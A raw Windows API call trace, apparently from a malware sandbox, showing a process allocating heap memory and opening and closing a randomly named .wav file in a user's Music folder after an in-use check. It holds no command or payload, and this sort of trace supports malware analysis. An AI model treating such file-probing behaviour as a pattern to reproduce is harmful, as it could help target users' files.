RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314d10 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0113.199] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0113.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0113.200] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6269c470, ftCreationTime.dwHighDateTime=0x1d5e1fa, ftLastAccessTime.dwLowDateTime=0x6f35fe70, ftLastAccessTime.dwHighDateTime=0x1d5e868, ftLastWriteTime.dwLowDateTime=0x6f35fe70, ftLastWriteTime.dwHighDateTime=0x1d5e868, nFileSizeHigh=0x0, nFileSizeLow=0x14149, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="_lDKW-L4K_DTCAjQT1.wav", cAlternateFileName="_LDKW-~1.WAV")) returned 0x41ac000 [0113.200] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0113.200] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0113.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0113.201] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0113.201] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0113.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0113.201] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0113.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0113.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\_ldkw-l4k_dtcajqt1.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0113.203] FreeLibrary (hLibModule=0x772d0000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.204] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.204] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.204] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0113.206] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0113.206] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0113.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0113.207] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0113.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca3d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.207] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0113.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0113.207] CloseHandle (hObject=0x258) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.208] FreeLibrary (hLibModule=0x772d0000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0113.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0113.208] 